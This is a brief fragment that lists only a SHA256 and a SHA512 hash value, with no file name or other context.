  SHA256:   01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33
  SHA512:   0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d